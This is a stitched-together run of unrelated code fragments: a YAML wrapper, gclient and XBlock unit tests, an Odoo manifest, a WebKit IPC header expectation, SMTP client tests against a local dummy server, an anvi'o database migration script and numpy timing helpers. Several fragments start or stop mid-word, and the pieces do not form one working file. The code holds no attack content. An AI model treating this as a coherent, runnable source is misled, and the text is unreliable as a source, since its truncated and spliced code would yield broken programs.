        self.yaml.representer.add_representer(type(None), none_representer)
        self.yaml.indent(mapping=2, sequence=4, offset=2)

    def load(self, stream):
        """Parse *stream* and return the resulting data structure."""
        return self.yaml.load(stream)

    def tr(self, x):
        """Post-process dumped YAML text.

        Inserts a blank line before each top-level list item and strips the
        two-space indent from every line that carries no '#' comment.
        """
        spaced = x.replace('\n-', '\n\n-')
        adjusted = [
            line if '#' in line else line[2:]
            for line in spaced.split('\n')
        ]
        return '\n'.join(adjusted)

    def dump(self, data, *args, **kwargs):
        """Serialize *data*; top-level lists get the tr() transform."""
        if isinstance(data, list):
            kwargs['transform'] = self.tr
        self.yaml.dump(data, *args, **kwargs)


# Module-level convenience wrappers around one shared YAML instance.
_yaml = YAML()


def load(*args, **kwargs):
    return _yaml.load(*args, **kwargs)


def dump(*args, **kwargs):
    return _yaml.dump(*args, **kwargs)
e self.assertTrue(exception_raised) def testTargetOsInDepsFile(self): """Verifies that specifying a target_os value in a DEPS file pulls in all relevant dependencies. The target_os variable in a DEPS file allows specifying the name of an additio
nal OS which should be considered when selecting dependencies from a DEPS' deps_os. The value will be appended to the _enforced_os tuple. """ write( '.gclient', 'solutions = [\n' ' { "name": "foo",\n' ' "url": "svn://example.com/foo",\n' ' },\n' ' { "name": "bar",\n' ' "url": "svn://example.com/bar",\n' ' }]\n') write( os.path.join('foo', 'DEPS'), 'target_os = ["baz"]\n' 'deps_os = {\n'
' "unix": { "foo/unix": "/unix", },\n' ' "baz": { "foo/baz": "/baz", },\n' ' "jaz": { "foo/jaz": "/jaz", },\n' '}') write( os.path.join('bar', 'DEPS'), 'deps_os = {\n' ' "unix": { "bar/unix": "/unix", },\n' ' "baz": { "bar/baz": "/baz", },\n' ' "jaz": { "bar/jaz": "/jaz", },\n' '}') parser = gclient.OptionParser() options, _ = parser.parse_args(['--jobs', '1']) options.deps_os = 'unix' obj = gclient.GClient.LoadCurrentConfig(options) obj.RunOnDeps('None', []) self.assertEqual(['unix'], sorted(obj.enforced_os)) self.assertEquals( [ ('bar', 'svn://example.com/bar'), ('bar/unix', 'svn://example.com/bar/unix'), ('foo', 'svn://example.com/foo'), ('foo/baz', 'svn://example.com/foo/baz'), ('foo/unix', 'svn://example.com/foo/unix'), ], sorted(self._get_processed())) def testUpdateWithOsDeps(self): """Verifies that complicated deps_os constructs result in the correct data also with multple operating systems. Also see testDepsOsOverrideDepsInDepsFile.""" test_data = [ # Tuples of deps, deps_os, os_list and expected_deps. ( # OS doesn't need module. {'foo': 'default_foo'}, {'os1': { 'foo': None } }, ['os1'], {'foo': None} ), ( # OS wants a different version of module. {'foo': 'default_foo'}, {'os1': { 'foo': 'os1_foo'} }, ['os1'], {'foo': 'os1_foo'} ), ( # OS with no overrides at all. {'foo': 'default_foo'}, {'os1': { 'foo': None } }, ['os2'], {'foo': 'default_foo'} ), ( # One OS doesn't need module, one OS wants the default. {'foo': 'default_foo'}, {'os1': { 'foo': None }, 'os2': {}}, ['os1', 'os2'], {'foo': 'default_foo'} ), ( # One OS doesn't need module, another OS wants a special version. {'foo': 'default_foo'}, {'os1': { 'foo': None }, 'os2': { 'foo': 'os2_foo'}}, ['os1', 'os2'], {'foo': 'os2_foo'} ), ( # One OS wants to add a module. {'foo': 'default_foo'}, {'os1': { 'bar': 'os1_bar' }}, ['os1'], {'foo': 'default_foo', 'bar': 'os1_bar'} ), ( # One OS wants to add a module. One doesn't care. 
{'foo': 'default_foo'}, {'os1': { 'bar': 'os1_bar' }}, ['os1', 'os2'], {'foo': 'default_foo', 'bar': 'os1_bar'} ), ( # Two OSes want to add a module with the same definition. {'foo': 'default_foo'}, {'os1': { 'bar': 'os12_bar' }, 'os2': { 'bar': 'os12_bar' }}, ['os1', 'os2'], {'foo': 'default_foo', 'bar': 'os12_bar'} ), ] for deps, deps_os, target_os_list, expected_deps in test_data: orig_deps = copy.deepcopy(deps) result = gclient.Dependency.MergeWithOsDeps(deps, deps_os, target_os_list) self.assertEqual(result, expected_deps) self.assertEqual(deps, orig_deps) def testLateOverride(self): """Verifies expected behavior of LateOverride.""" url = "git@github.com:dart-lang/spark.git" d = gclient.Dependency(None, 'name', 'url', None, None, None, None, None, '', True, False) late_url = d.LateOverride(url) self.assertEquals(url, late_url) def testDepsOsOverrideDepsInDepsFile(self): """Verifies that a 'deps_os' path can override a 'deps' path. Also see testUpdateWithOsDeps above. """ write( '.gclient', 'solutions = [\n' ' { "name": "foo",\n' ' "url": "svn://example.com/foo",\n' ' },]\n') write( os.path.join('foo', 'DEPS'), 'target_os = ["baz"]\n' 'deps = {\n' ' "foo/src": "/src",\n' # This path is to be overridden by similar path # in deps_os['unix']. '}\n' 'deps_os = {\n' ' "unix": { "foo/unix": "/unix",' ' "foo/src": "/src_unix"},\n' ' "baz": { "foo/baz": "/baz",\n' ' "foo/src": None},\n' ' "jaz": { "foo/jaz": "/jaz", },\n' '}') parser = gclient.OptionParser() options, _ = parser.parse_args(['--jobs', '1']) options.deps_os = 'unix' obj = gclient.GClient.LoadCurrentConfig(options) obj.RunOnDeps('None', []) self.assertEqual(['unix'], sorted(obj.enforced_os)) self.assertEquals( [ ('foo', 'svn://example.com/foo'), ('foo/baz', 'svn://example.com/foo/baz'), ('foo/src', 'svn://example.com/foo/src_unix'), ('foo/unix', 'svn://example.com/foo/unix'), ], sorted(self._get_processed())) def testRecursionOverride(self): """Verifies gclient respects the |recursion| var syntax. 
We check several things here: - |recursion| = 3 sets recursion on the foo dep to exactly 3 (we pull /fizz, but not /fuzz) - pulling foo/bar at recursion level 1 (in .gclient) is overriden by a later pull of foo/bar at recursion level 2 (in the dep tree) """ write( '.gclient', 'solutions = [\n' ' { "name": "foo", "url": "svn://example.com/foo" },\n' ' { "name": "foo/bar", "url": "svn://example.com/bar" },\n' ']') write( os.path.join('foo', 'DEPS'), 'deps = {\n' ' "bar": "/bar",\n' '}\n' 'recursion = 3') write( os.path.join('bar', 'DEPS'), 'deps = {\n' ' "baz": "/baz",\n' '}') write( os.path.join('baz', 'DEPS'), 'deps = {\n' ' "fizz": "/fizz",\n' '}') write( os.path.join('fizz', 'DEPS'), 'deps = {\n' ' "fuzz": "/fuzz",\n' '}') options, _ = gclient.OptionParser().parse_args([]) obj = gclient.GClient.LoadCurrentConfig(options) obj.RunOnDeps('None', []) self.assertEquals( [ ('foo', 'svn://example.com/foo'), ('foo/bar', 'svn://example.com/bar'), ('bar', 'svn://example.com/foo/bar'), ('baz', 'svn://example.com/foo/bar/baz'), ('fizz', 'svn://example.com/foo/bar/baz/fizz'), ], self._get_processed()) def testRecursedepsOverride(self): """Verifies gclient respects the |recursedeps| var syntax. This is what we mean to check here: - |recursedeps| = [...] on 2 levels means we pull exactly 3 deps (up to /fizz, but not /fuzz) - pulling foo/bar with no recursion (in .gclient) is overriden by a later pull of foo/bar with recursion (in the dep tree) - pulling foo/tar with no recursion (in .gclient) is no recursively pulled (taz is left out) """ write( '.gclient', 'solutions = [\n' ' { "name": "foo", "url": "svn://example.com/foo" },\n' ' { "name": "foo/bar", "url": "svn://example.com/bar" },\n' ' { "name": "foo/tar", "url": "svn://example.com/tar" },\n' ']') write( os.path.join('foo', 'DEPS'), 'deps = {\n' ' "bar": "/bar",\n' '}\n' 'recursedeps = ["bar"]') write( os.path.join('b
scope=Scope.settings, name='') settings_lst = List(scope=Scope.settings, name='') uss_lst = List(scope=Scope.user_state_summary, name='') user_lst = List(scope=Scope.user_state, name='') pref_lst = List(scope=Scope.preferences, name='') user_info_lst = List(scope=Scope.user_info, name='') sids = ScopeIds(user_id="_bob", block_type="b.12#ob", def_id="..", usage_id="..") field_data = DictFieldData({}) runtime = TestRuntime(Mock(), services={'field-data': field_data}) block = TestBlock(runtime, None, sids) # Format: usage or block ID/field_name/user_id for item, correct_key in [[TestBlock.field_x, "__..../field__x/NONE.NONE"], [TestBlock.user_info_lst, "NONE.NONE/user__info__lst/____bob"], [TestBlock.pref_lst, "b..12_35_ob/pref__lst/____bob"], [TestBlock.user_lst, "__..../user__lst/____bob"], [TestBlock.uss_lst, "__..../uss__lst/NONE.NONE"], [TestBlock.settings_lst, "__..../settings__lst/NONE.NONE"]]: key = scope_key(item, block) assert_equals(key, correct_key) def test_field_display_name(): attempts = Integer(display_name='Maximum Problem Attempts') attempts._name = "max_problem_attempts" assert_equals("Maximum Problem Attempts", attempts.display_name) boolean_field = Boolean(display_name="boolean field") assert_equals("boolean field", boolean_field.display_name) class TestBlock(XBlock): """ Block for testing """ field_x = List(display_name="Field Known as X") assert_equals("Field Known as X", TestBlock.field_x.display_name) def test_unique_id_default(): class TestBlock(XBlock): """ Block for testing """ field_a = String(default=UNIQUE_ID, scope=Scope.settings) field_b = String(default=UNIQUE_ID, scope=Scope.user_state) sids = ScopeIds(user_id="bob", block_type="bobs-type", def_id="definition-id", usage_id="usage-id") runtime = TestRuntime(services={'field-data': DictFieldData({})}) block = TestBlock(runtime, DictFieldData({}), sids) unique_a = block.field_a unique_b = block.field_b # Create another instance of the same block. Unique ID defaults should not change. 
runtime = TestRuntime(services={'field-data': DictFieldData({})}) block = TestBlock(runtime, DictFieldData({}), sids) assert_equals(unique_a, block.field_a) assert_equals(unique_b, block.field_b) # Change the user id. Unique ID default should change for field_b with # user_state scope, but not for field_a with scope=settings. runtime = TestRuntime(services={'field-data': DictFieldData({})}) block = TestBlock(runtime, DictFieldData({}), sids._replace(user_id='alice')) assert_equals(unique_a, block.field_a) assert_not_equals(unique_b, block.field_b) # Change the usage id. Unique ID default for both fields should change. runtime = TestRuntime(services={'field-data': DictFieldData({})}) block = TestBlock(runtime, DictFieldData({}), sids._replace(usage_id='usage-2')) assert_not_equals(unique_a, block.field_a) assert_not_equals(unique_b, block.field_b) def test_values(): # static return value field_values = ['foo', 'bar'] test_field = String(values=field_values) assert_equals(field_values, test_field.values) # function to generate values test_field = String(values=lambda: [1, 4]) assert_equals([1, 4], test_field.values) # default if nothing specified assert_equals(None, String().values) def test_values_boolean(): # Test Boolean, which has values defined test_field = Boolean() assert_equals( ({'display_name': "True", "value": True}, {'display_name': "False", "value": False}), test_field.values ) def test_values_dict(): # Test that the format expected for integers is allowed test_field = Integer(values={"min": 1, "max": 100}) assert_equals({"min": 1, "max": 100}, test_field.values) def test_set_incomparable_fields(): # if we can't compare a field's value to the value it's going to be reset to # (i.e. timezone aware and unaware datetimes), just reset the value. 
class FieldTester(XBlock): """Test block for this test.""" incomparable = Field(scope=Scope.settings) not_timezone_aware = dt.datetime(2015, 1, 1) timezone_aware = dt.datetime(2015, 1, 1, tzinfo=pytz.UTC) runtime = TestRuntime(services={'field-data': DictFieldData({})}) field_tester = FieldTester(runtime, scope_ids=Mock(spec=ScopeIds)) field_tester.incomparable = not_timezone_aware field_tester.incomparable = timezone_aware assert_equals(field_tester.incomparable, timezone_aware) def test_twofaced_field_access(): # Check that a field with different to_json and from_json representations # persists and saves correctly. class TwoFacedField(Field): """A field that emits different 'json' than it parses.""" def from_json(self, thestr): """Store an int, the length of the string parsed.""" return len(thestr) def to_json(self, value): """Emit some number of X's.""" return "X" * value class FieldTester(XBlock): """Test block for TwoFacedField.""" how_many = TwoFacedField(scope=Scope.settings) original_json = "YYY" runtime = TestRuntime(services={'field-data': DictFieldData({'how_many': original_json})}) field_tester = FieldTester(runtime, scope_ids=Mock(spec=ScopeIds)) # Test that the native value isn't equal to the original json we specified. assert_not_equals(field_tester.how_many, original_json) # Test that the native -> json value isn't equal to the original json we specified. assert_not_equals(TwoFacedField().to_json(field_tester.how_many), original_json) # The previous accesses will mark the field as dirty (via __get__) assert_equals(len(field_tester._dirty_fields), 1)
# However, the field should not ACTUALLY be marked as a field that is needing to be saved. assert_not_in('how_many', field_tester._get_fields_to_save()) # pylint: disable=W0212 def test_setting_the_same_value_marks_field_as_dirty(): """ Check that setting field to the same value marks mutable fields as dirty. However, since the value has
n't changed, these fields won't be saved. """ class FieldTester(XBlock): """Test block for set - get test.""" non_mutable = String(scope=Scope.settings) list_field = List(scope=Scope.settings) dict_field = Dict(scope=Scope.settings) runtime = TestRuntime(services={'field-data': DictFieldData({})}) field_tester = FieldTester(runtime, scope_ids=Mock(spec=ScopeIds)) # precondition checks assert_equals(len(field_tester._dirty_fields), 0) assert_false(field_tester.fields['list_field'].is_set_on(field_tester)) assert_false(field_tester.fields['dict_field'].is_set_on(field_tester)) assert_false(field_tester.fields['non_mutable'].is_set_on(field_tester)) field_tester.non_mutable = field_tester.non_mutable field_tester.list_field = field_tester.list_field field_tester.dict_field = field_tester.dict_field assert_not_in(field_tester.fields['non_mutable'], field_tester._dirty_fields) assert_in(field_tester.fields['list_field'], field_tester._dirty_fields) assert_in(field_tester.fields['dict_field'], field_tester._dirty_fields) assert_false(field_tester.fields['non_mutable'].is_set_on(field_tester)) assert_false(field_tester.fields['list_field'].is_set_on(field_tester)) assert_false(field_tester.fields['dict_field'].is_set_on(field_tester)) class SentinelTest(unittest.TestCase): """ Tests of :ref:`xblock.fields.Sentinel`. """ def test_equality(self): base = Sentinel('base') self.assertEquals(base, base) self.assertEquals(base, Sentinel('
# -*- coding: utf-8 -*-
# (c) 2015 Antiun Ingeniería S.L. - Pedro M. Baeza
# (c) 2015 AvanzOSC - Ainara Galdona
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0
# Odoo addon manifest: adds VAT prorate ("prorrata de IVA") support on top of
# the Spanish AEAT form 303 module.
{
    "name": "AEAT - Prorrata de IVA",
    # Version scheme is <odoo-series>.<module-version>; this targets Odoo 8.0.
    "version": "8.0.2.0.0",
    "license": "AGPL-3",
    # Adjacent string literals are concatenated into a single author string.
    "author": "AvanzOSC, "
              "Antiun Ingeniería S.L., "
              "Serv. Tecnol. Avanzados - Pedro M. Baeza, "
              "Odoo Community Association (OCA)",
    "website": "https://github.com/OCA/l10n-spain",
    "category": "Accounting",
    # Requires the base AEAT mod 303 (VAT) addon to extend it.
    "depends": [
        'l10n_es_aeat_mod303',
    ],
    # Data files loaded on install/upgrade: tax-code mappings, export config,
    # the prorate computation wizard and the mod303 view extension.
    "data": [
        "data/tax_code_map_mod303_data.xml",
        "data/aeat_export_mod303_data.xml",
        'wizard/l10n_es_aeat_compute_vat_prorrate_view.xml',
        'views/mod303_view.xml'
    ],
    "installable": True,
}
terials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR * SERVICES; LOSS OF USE, DATA,
OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #ifndef WebPageMessages_h #define WebPageMessages_h #if ENABLE(WEBKIT2) #include "Arguments.h" #include "Connection.h" #include "MessageID.h" #include "Plugin.h" #include <WebCore/KeyboardEvent.h> #include <WebCore
/PluginData.h> #include <wtf/ThreadSafeRefCounted.h> #include <wtf/Vector.h> namespace CoreIPC { class ArgumentEncoder; class Connection; class MachPort; } namespace WTF { class String; } namespace WebKit { struct WebPreferencesStore; class WebTouchEvent; } namespace Messages { namespace WebPage { enum Kind { LoadURLID, #if ENABLE(TOUCH_EVENTS) TouchEventID, #endif DidReceivePolicyDecisionID, CloseID, PreferencesDidChangeID, SendDoubleAndFloatID, SendIntsID, CreatePluginID, RunJavaScriptAlertID, GetPluginsID, GetPluginProcessConnectionID, TestMultipleAttributesID, #if PLATFORM(MAC) DidCreateWebProcessConnectionID, #endif #if PLATFORM(MAC) InterpretKeyEventID, #endif }; struct LoadURL : CoreIPC::Arguments1<const WTF::String&> { static const Kind messageID = LoadURLID; typedef CoreIPC::Arguments1<const WTF::String&> DecodeType; explicit LoadURL(const WTF::String& url) : CoreIPC::Arguments1<const WTF::String&>(url) { } }; #if ENABLE(TOUCH_EVENTS) struct TouchEvent : CoreIPC::Arguments1<const WebKit::WebTouchEvent&> { static const Kind messageID = TouchEventID; typedef CoreIPC::Arguments1<const WebKit::WebTouchEvent&> DecodeType; explicit TouchEvent(const WebKit::WebTouchEvent& event) : CoreIPC::Arguments1<const WebKit::WebTouchEvent&>(event) { } }; #endif struct DidReceivePolicyDecision : CoreIPC::Arguments3<uint64_t, uint64_t, uint32_t> { static const Kind messageID = DidReceivePolicyDecisionID; typedef CoreIPC::Arguments3<uint64_t, uint64_t, uint32_t> DecodeType; DidReceivePolicyDecision(uint64_t frameID, uint64_t listenerID, uint32_t policyAction) : CoreIPC::Arguments3<uint64_t, uint64_t, uint32_t>(frameID, listenerID, policyAction) { } }; struct Close : CoreIPC::Arguments0 { static const Kind messageID = CloseID; typedef CoreIPC::Arguments0 DecodeType; }; struct PreferencesDidChange : CoreIPC::Arguments1<const WebKit::WebPreferencesStore&> { static const Kind messageID = PreferencesDidChangeID; typedef CoreIPC::Arguments1<const WebKit::WebPreferencesStore&> 
DecodeType; explicit PreferencesDidChange(const WebKit::WebPreferencesStore& store) : CoreIPC::Arguments1<const WebKit::WebPreferencesStore&>(store) { } }; struct SendDoubleAndFloat : CoreIPC::Arguments2<double, float> { static const Kind messageID = SendDoubleAndFloatID; typedef CoreIPC::Arguments2<double, float> DecodeType; SendDoubleAndFloat(double d, float f) : CoreIPC::Arguments2<double, float>(d, f) { } }; struct SendInts : CoreIPC::Arguments2<const Vector<uint64_t>&, const Vector<Vector<uint64_t> >&> { static const Kind messageID = SendIntsID; typedef CoreIPC::Arguments2<const Vector<uint64_t>&, const Vector<Vector<uint64_t> >&> DecodeType; SendInts(const Vector<uint64_t>& ints, const Vector<Vector<uint64_t> >& intVectors) : CoreIPC::Arguments2<const Vector<uint64_t>&, const Vector<Vector<uint64_t> >&>(ints, intVectors) { } }; struct CreatePlugin : CoreIPC::Arguments2<uint64_t, const WebKit::Plugin::Parameters&> { static const Kind messageID = CreatePluginID; typedef CoreIPC::Arguments1<bool&> Reply; typedef CoreIPC::Arguments2<uint64_t, const WebKit::Plugin::Parameters&> DecodeType; CreatePlugin(uint64_t pluginInstanceID, const WebKit::Plugin::Parameters& parameters) : CoreIPC::Arguments2<uint64_t, const WebKit::Plugin::Parameters&>(pluginInstanceID, parameters) { } }; struct RunJavaScriptAlert : CoreIPC::Arguments2<uint64_t, const WTF::String&> { static const Kind messageID = RunJavaScriptAlertID; typedef CoreIPC::Arguments0 Reply; typedef CoreIPC::Arguments2<uint64_t, const WTF::String&> DecodeType; RunJavaScriptAlert(uint64_t frameID, const WTF::String& message) : CoreIPC::Arguments2<uint64_t, const WTF::String&>(frameID, message) { } }; struct GetPlugins : CoreIPC::Arguments1<bool> { static const Kind messageID = GetPluginsID; typedef CoreIPC::Arguments1<Vector<WebCore::PluginInfo>&> Reply; typedef CoreIPC::Arguments1<bool> DecodeType; explicit GetPlugins(bool refresh) : CoreIPC::Arguments1<bool>(refresh) { } }; struct GetPluginProcessConnection : 
CoreIPC::Arguments1<const WTF::String&> { static const Kind messageID = GetPluginProcessConnectionID; struct DelayedReply : public ThreadSafeRefCounted<DelayedReply> { DelayedReply(PassRefPtr<CoreIPC::Connection>, PassOwnPtr<CoreIPC::ArgumentEncoder>); ~DelayedReply(); bool send(const CoreIPC::Connection::Handle& connectionHandle); private: RefPtr<CoreIPC::Connection> m_connection; OwnPtr<CoreIPC::ArgumentEncoder> m_arguments; }; typedef CoreIPC::Arguments1<CoreIPC::Connection::Handle&> Reply; typedef CoreIPC::Arguments1<const WTF::String&> DecodeType; explicit GetPluginProcessConnection(const WTF::String& pluginPath) : CoreIPC::Arguments1<const WTF::String&>(pluginPath) { } }; struct TestMultipleAttributes : CoreIPC::Arguments0 { static const Kind messageID = TestMultipleAttributesID; struct DelayedReply : public ThreadSafeRefCounted<DelayedReply> { DelayedReply(PassRefPtr<CoreIPC::Connection>, PassOwnPtr<CoreIPC::ArgumentEncoder>); ~DelayedReply(); bool send(); private: RefPtr<CoreIPC::Connection> m_connection; OwnPtr<CoreIPC::ArgumentEncoder> m_arguments; }; typedef CoreIPC::Arguments0 Reply; typedef CoreIPC::Arguments0 DecodeType; }; #if PLATFORM(MAC) struct DidCreateWebProcessConnection : CoreIPC::Arguments1<const CoreIPC::MachPort&> { static const Kind messageID = DidCreateWebProcessConnectionID; typedef CoreIPC::Arguments1<const CoreIPC::MachPort&> DecodeType; explicit DidCreateWebProcessConnection(const CoreIPC::MachPort& connectionIdentifier) : CoreIPC::Arguments1<const CoreIPC::MachPort&>(connectionIdentifier) { } }; #endif #if PLATFORM(MAC) struct InterpretKeyEvent : CoreIPC::Arguments1<uint32_t> { static const Kind messageID = InterpretKeyEventID; typedef CoreIPC::Arguments1<Vector<WebCore::KeypressCommand>&> Reply; typedef CoreIPC::Arguments1<uint32_t> DecodeType; explicit InterpretKeyEvent(uint32_t type) : CoreIPC::Arguments1<uint32_t>(type) { } }; #endif } // namespace WebPage } // namespace Messages namespace CoreIPC { template<> struct 
MessageKindTraits<Messages::WebPage::Kind> { static const MessageClass messageClass = MessageClassWebPage; }; } // namespace CoreIPC #endif // ENABLE(WEBKIT2) #endif // WebPageMessages_h """ _expected_receiver_implementation = """/* * Copyright (C) 2010 Apple Inc. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following
ost_func, default_func) = \ AbstractSMTPAccount.get_register_fields()[0] value = post_func("False", None, "user1@test.com") self.assertFalse(value) self.assertTrue(account12.default_account) def test_create_email(self): account11 = AbstractSMTPAccount(user=User(jid="user1@test.com"), name="account11", jid="account11@jmc.test.com") email = account11.create_email("from@test.com", "to@test.com", "subject", "body") self.assertEqual(email['From'], "from@test.com") self.assertEqual(email['To'], "to@test.com") self.assertEqual(email['Subject'], "subject") self.assertEqual(email.get_payload(), "body") def test_create_email_other_headers(self): account11 = AbstractSMTPAccount(user=User(jid="user1@test.com"), name="account11", jid="account11@jmc.test.com") email = account11.create_email("from@test.com", "to@test.com", "subject", "body", {"Bcc": "bcc@test.com", "Cc": "cc@test.com"}) self.assertEqual(email['From'], "from@test.com") self.assertEqual(email['To'], "to@test.com") self.assertEqual(email['Subject'], "subject") self.assertEqual(email['Bcc'], "bcc@test.com") self.assertEqual(email['Cc'], "cc@test.com") self.assertEqual(email.get_payload(), "body") class SMTPAccount_TestCase(Account_TestCase): def setUp(self): JCLTestCase.setUp(self, tables=[Account, ExampleAccount, User, GlobalSMTPAccount, AbstractSMTPAccount, SMTPAccount]) self.account_class = SMTPAccount def make_test(self, responses=None, queries=None, core=None): def inner(): self.server = server.DummyServer("localhost", 1025) thread.start_new_thread(self.server.serve, ()) self.server.responses = [] if responses: self.server.responses += responses self.server.responses += ["221 localhost closing connection\r\n"] self.server.queries = [] if queries: self.server.queries += queries self.server.queries += ["quit\r\n"] if core: model.db_connect() core(self) model.db_disconnect() self.failUnless(self.server.verify_queries()) return inner def test_send_email_esmtp_no_auth(self): model.db_connect() smtp_account = 
SMTPAccount(user=User(jid="user1@test.com"), name="account11", jid="account11@jmc.test.com") smtp_account.host = "localhost" smtp_account.port = 1025 model.db_disconnect() email = smtp_account.create_email("from@test.com", "to@test.com", "subject", "body") test_func = self.make_test(["220 localhost ESMTP\r\n", "250-localhost Hello 127.0.0.1\r\n" + "250-SIZE 52428800\r\n" + "250-PIPELINING\r\n" + "250 HELP\r\n", "250 OK\r\n", "250 Accepted\r\n", "354 Enter message\r\n", None, None, None, None, None, None, None, None, "250 OK\r\n"], ["ehlo .*\r\n", "mail FROM:<" + str(email['From']) + ">.*", "rcpt TO:<" + str(email['To']) + ">\r\n", "data\r\n"] + email.as_string().split("\n") + [".\r\n"], lambda self: \ smtp_account.send_email(email)) test_func() def test_send_email_no_auth(self): model.db_connect() smtp_account = SMTPAccount(user=User(jid="user1@test.com"), name="account11", jid="account11@jmc.test.com") smtp_account.host = "localhost" smtp_account.port = 1025 model.db_disconnect() email = smtp_account.create_email("from@test.com", "to@test.com", "subject", "body") test_func = self.make_test(["220 localhost SMTP\r\n", "504 ESMTP not supported\r\n", "250-localhost Hello 127.0.0.1\r\n" + "250-SIZE 52428800\r\n" + "250-PIPELINING\r\n" + "250 HELP\r\n", "250 OK\r\n", "250 Accepted\r\n", "354 Enter message\r\n", None, None, None, None, None, None, None, None, "250 OK\r\n"], ["ehlo .*\r\n", "helo .*\r\n", "mail FROM:<" + str(email['From']) + ">.*", "rcpt TO:<" + str(email['To']) + ">\r\n", "data\r\n"] + email.as_string().split("\n") + [".\r\n"], lambda self: \ smtp_account.send_email(email)) test_func() def test_send_email_esmtp_auth(self): model.db_connect() smtp_account = SMTPAccount(user=User(jid="user1@test.com"), name="account11", jid="account11@jmc.test.com") smtp_account.host = "localhost" smtp_account.port = 1025 smtp_account.login = "user" smtp_account.password = "pass" model.db_disconnect() email = smtp_account.create_email("from@test.com", "to@test.com", 
"subject", "body") test_func = self.make_test(["220 localhost ESMTP\r\n", "250-localhost Hello 127.0.0.1\r\n" + "250-SIZE 52428800\r\n" + "250-AUTH PLAIN LOGIN CRAM-MD5\r\n" + "250-PIPELINING\r\n" + "250 HELP\r\n", "334 ZGF4IDNmNDM2NzY0YzBhNjgyMTQ1MzhhZGNiMjE2YTYxZjRm\r\n", "235 Authentication succeeded\r\n",
"250 OK\r\n", "250 Accepted\r\n",
"354 Enter message\r\n", None, None, None, None, None, None, None, None, "250 OK\r\n"], ["ehlo .*\r\n", "AUTH CRAM-MD5\r\n", ".*\r\n", "mail FROM:<" + str(email['From']) + ">.*",
#!/usr/bin/env python
# -*- coding: utf-8
"""One-shot migration script for anvi'o profile databases.

Rewrites every newick-formatted tree stored in the ``item_orders`` and
``layer_orders`` tables from ete3 ``format=1`` to ``format=2``, then bumps the
database version. The source/target versions are parsed from the module name
(expected to look like ``vN_to_vM``).
"""

import sys
import argparse

from ete3 import Tree

import anvio.db as db
import anvio.utils as utils
import anvio.terminal as terminal

from anvio.errors import ConfigError

run = terminal.Run()
progress = terminal.Progress()

# Module is expected to be named like 'v23_to_v24'; strip the leading 'v'
# from each half to get the bare version numbers.
current_version, next_version = [x[1:] for x in __name__.split('_to_')]

# Schema constants for the two tables touched by this migration.
item_orders_table_name = 'item_orders'
item_orders_table_structure = ['name', 'type', 'data']
item_orders_table_types = ['text', 'text', 'text']

layer_orders_table_name = 'layer_orders'
layer_orders_table_structure = ['data_key', 'data_type', 'data_value']
layer_orders_table_types = ['text', 'text', 'text']


def migrate(db_path):
    """Upgrade the profile database at ``db_path`` in place.

    Raises ConfigError if no path is given, the file is not a profile
    database, or its version does not match ``current_version``.
    """
    if db_path is None:
        raise ConfigError("No database path is given.")

    # make sure someone is not being funny
    utils.is_profile_db(db_path)

    # make sure the version is accurate
    profile_db = db.DB(db_path, None, ignore_version = True)
    if str(profile_db.get_version()) != current_version:
        raise ConfigError("Version of this profile database is not %s (hence, this script cannot really do anything)." % current_version)

    # migrate item orders: re-serialize newick trees from ete3 format 1 to 2.
    item_orders = profile_db.get_table_as_dict(item_orders_table_name)
    for order_name in item_orders:
        if item_orders[order_name]['type'] == 'newick':
            newick = Tree(item_orders[order_name]['data'], format=1)
            newick = newick.write(format=2)
            profile_db._exec("""UPDATE %s SET "data" = ? WHERE "name" LIKE ?""" % item_orders_table_name, (newick, order_name))

    # migrate layer orders the same way (different column names).
    layer_orders = profile_db.get_table_as_dict(layer_orders_table_name)
    for order_name in layer_orders:
        if layer_orders[order_name]['data_type'] == 'newick':
            newick = Tree(layer_orders[order_name]['data_value'], format=1)
            newick = newick.write(format=2)
            profile_db._exec("""UPDATE %s SET "data_value" = ? WHERE "data_key" LIKE ?""" % layer_orders_table_name, (newick, order_name))

    # set the version: drop the old meta entry, then record the new one.
    profile_db.remove_meta_key_value_pair('version')
    profile_db.set_version(next_version)

    # bye
    profile_db.disconnect()
    progress.end()
    run.info_single('Your profile db is now %s. Aww, yisss.' % next_version, nl_after=1, nl_before=1, mc='green')


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='A simple script to upgrade profile database from version %s to version %s' % (current_version, next_version))
    parser.add_argument('profile_db', metavar = 'PROFILE_DB', help = "An anvi'o profile database of version %s" % current_version)
    # parse_known_args so unrelated extra flags do not abort the migration.
    args, unknown = parser.parse_known_args()

    try:
        migrate(args.profile_db)
    except ConfigError as e:
        print(e)
        sys.exit(-1)
import warnings

import numpy as np

# Values outside the open interval (min_threshold, max_threshold) are treated
# as non-switching events throughout this module. 1253 is presumably the
# PreAmp timer's saturation count -- TODO confirm against the hardware spec.


def mean_time(t, min_threshold=0, max_threshold=1253):
    """
    Take a switch probability result array from the PreAmp timer, and
    compute mean switching time using the specified thresholds.

    Timing data is assumed to be a numpy array. Returns ``(mean, std)``,
    or ``(nan, nan)`` when no sample falls inside the thresholds.
    """
    t = t[np.logical_and(t > min_threshold, t < max_threshold)]
    if np.size(t) > 0:
        return np.mean(t), np.std(t)
    return np.nan, np.nan


def mean_time_diff(t, min_threshold=0, max_threshold=1253):
    """
    Take a switch probability result array from the PreAmp timers, and
    compute the mean switching-time difference ``t[0] - t[1]`` using the
    specified thresholds.

